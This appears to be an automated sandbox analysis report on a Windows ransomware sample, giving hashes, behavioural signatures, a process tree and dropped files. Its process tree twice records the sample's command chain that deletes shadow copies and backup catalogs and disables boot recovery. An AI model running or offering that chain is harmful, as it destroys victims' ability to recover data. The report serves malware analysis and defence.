Analysis

  • max time kernel
    131s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250502-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20250502-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19/05/2025, 14:51

General

  • Target

    2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe

  • Size

    197KB

  • MD5

    b35a7c0c23349c34d7eaa11be87681b3

  • SHA1

    265a3a1b889a9f3f5bb53f9e5d1cbc7f48d24fe8

  • SHA256

    c032b020f742add231aa1b02c90240cc702d81ccd255c015284c1389ef1e7b6c

  • SHA512

    67a8c9eb39da8f24a48acee027706052d68b59cbad05e9028bafb70ba77a562c8ae1b72c375bcd03ea1846775c577bff005ed148ba8dd0963673c91144846dd2

  • SSDEEP

    3072:zQ7pevne/DLB5w20WLjF72xnEt44etrlV9Yl4cqnj:zQ7peve/DLB56gF72CW4etrlV9m4

Malware Config

Signatures

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (67) files with added filename extension

    This suggests ransomware activity: the sample is encrypting files across the system and appending an extension to each one.

  • Drops file in Drivers directory 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops desktop.ini file(s) 20 IoCs
  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempts to gather information about the victim system's language in order to infer the geographical location of that host.

  • Modifies registry class 2 IoCs
  • NTFS ADS 1 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe"
    1⤵
    • Drops file in Drivers directory
    • Checks computer location settings
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Sets desktop wallpaper using registry
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4160
    • C:\Windows\SysWOW64\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\APEXNOTE.txt
      2⤵
      • System Location Discovery: System Language Discovery
      • Opens file in notepad (likely ransom note)
      PID:4376
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:956
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:4644
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\usb_maker.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      • NTFS ADS
      PID:3080
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\discord.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1712
    • C:\Users\Admin\AppData\Local\discord.exe
      C:\Users\Admin\AppData\Local\discord.exe
      2⤵
      • Drops file in Drivers directory
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Drops desktop.ini file(s)
      • Sets desktop wallpaper using registry
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:1148
      • C:\Windows\SysWOW64\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\APEXNOTE.txt
        3⤵
        • System Location Discovery: System Language Discovery
        • Opens file in notepad (likely ransom note)
        PID:3292
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4372
        • C:\Windows\SysWOW64\Wbem\WMIC.exe
          wmic shadowcopy delete
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4212
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\usb_maker.bat" "
        3⤵
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        PID:5032
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    PID:3568

    Network

          MITRE ATT&CK Enterprise v16

          Downloads

          • C:\Users\Admin\AppData\Local\discord.exe

            Filesize

            197KB

            MD5

            b35a7c0c23349c34d7eaa11be87681b3

            SHA1

            265a3a1b889a9f3f5bb53f9e5d1cbc7f48d24fe8

            SHA256

            c032b020f742add231aa1b02c90240cc702d81ccd255c015284c1389ef1e7b6c

            SHA512

            67a8c9eb39da8f24a48acee027706052d68b59cbad05e9028bafb70ba77a562c8ae1b72c375bcd03ea1846775c577bff005ed148ba8dd0963673c91144846dd2

          • C:\Users\Admin\AppData\Roaming\ID

            Filesize

            40B

            MD5

            ff1447561eae283bddeb71e3ea3168cb

            SHA1

            3399abb7e65489ccddc2118079c1ec2ce2f5404f

            SHA256

            915cd36509e6360c2e35301430765ddc70a37057109c4806c7837452431d8b02

            SHA512

            7e50186680e387a137c67f247201afe5809891050784a15ca510435e40947de6f3efb07db5e921bfda94a3e26927b2b833cdf4d1b66a3d7400d7fe3453aa7bad

          • C:\Users\Admin\AppData\Roaming\fondo_antiguo.jpg

            Filesize

            24KB

            MD5

            25342190bcc364d32b9e9f9928b5a8a5

            SHA1

            3ae3bdabaed70dba1fd96c0be72e17aa91c7802a

            SHA256

            d626e482d44f5fc8eb1c9b2cd08070150ab99afe40cf6dc939015b01b09088f4

            SHA512

            c0f4f1831f289d4d60e9323e36689c2e0aaa9a7de3dbe4e65b2974d26d3f6f480a7160f5eff2ad458f8b0a7f36057bfba9c7a1b62769091b02640176bd2e53c3

          • C:\Users\Admin\AppData\Roaming\usb_maker.bat

            Filesize

            1KB

            MD5

            2e8e30afd640ba60cee4644e27efecf2

            SHA1

            31f6a7727c6b40419715b769d6a60b3872868b5b

            SHA256

            034c79570dc0d54160ed0d3b4435bf4fdcae10a0d2ab688348f112f399d6ea14

            SHA512

            052401dbc296664301a8b0522296c3af22ddc1b36d3e782bcda2709b20aa47085cdf080bb536c34533c1d595768e21035112060f3672e3b82d5e23001c41f76b

          • C:\Users\Admin\Downloads\APEXNOTE.txt

            Filesize

            800B

            MD5

            bdba72b1177bdfc5dee1d9941fdcae45

            SHA1

            a7713959c8f0a6d8d7a6169665e87b009ac04b10

            SHA256

            dd1e78ae51782f025cad303019e331c493d20bc0f7f71c0c186a85be24ee13be

            SHA512

            3eca03cd090b483beb4e2009a535905ce6ac8100782f46dd681db1e2e25960cd854d303f2820225581b6e25a89925f0199fa022887a5c3c59f53297eb0884b5a

          • C:\Users\Admin\Pictures\imagexSIxnnbNiOVYwyIIHwotgPgRNKhzjW.jpg

            Filesize

            95KB

            MD5

            23dcba6ae05640c3c9c1621cd9f4cd7f

            SHA1

            0b6ecd44bac5a58ba27dfdb26d9a8759723f1e3f

            SHA256

            f7fc0500d8f3b0596e080a801561a86ce76670e85461c9a56537a011dbd595b0

            SHA512

            11ac6c8fc9c45043757b7e0c2c9704c5ef75bd7b80794dbf0eea0a3c0d672164feb6e56d5685e4b8ef7c629394526794a9f32e0d093c6ffbfd7e3520002da18b

          • C:\Windows\System32\drivers\etc\hosts

            Filesize

            3KB

            MD5

            de941294418545204a4ec21837641098

            SHA1

            5b6c90046d37841e0096b1f85d021836f2b09639

            SHA256

            1d7320e6895f426fe4f7bf535b0a63e8308202a6d1a7b790498c45ad5fc58cea

            SHA512

            fcecb0fee780eda474576afb6fa799fadb5a82d1eb725f93bdcdc4bd7617361f254d03510cbb7f50b1f056e15dd51f56d4a5027e21b4d6289a5e283e0a6b0daf

          • memory/1148-26-0x0000000074770000-0x0000000074F20000-memory.dmp

            Filesize

            7.7MB

          • memory/1148-23-0x0000000074770000-0x0000000074F20000-memory.dmp

            Filesize

            7.7MB

          • memory/1148-331-0x0000000074770000-0x0000000074F20000-memory.dmp

            Filesize

            7.7MB

          • memory/4160-0-0x000000007477E000-0x000000007477F000-memory.dmp

            Filesize

            4KB

          • memory/4160-5-0x0000000005970000-0x000000000597A000-memory.dmp

            Filesize

            40KB

          • memory/4160-4-0x0000000074770000-0x0000000074F20000-memory.dmp

            Filesize

            7.7MB

          • memory/4160-3-0x0000000005830000-0x00000000058C2000-memory.dmp

            Filesize

            584KB

          • memory/4160-2-0x0000000005D00000-0x00000000062A4000-memory.dmp

            Filesize

            5.6MB

          • memory/4160-1-0x0000000000E10000-0x0000000000E48000-memory.dmp

            Filesize

            224KB

          • memory/4160-333-0x0000000074770000-0x0000000074F20000-memory.dmp

            Filesize

            7.7MB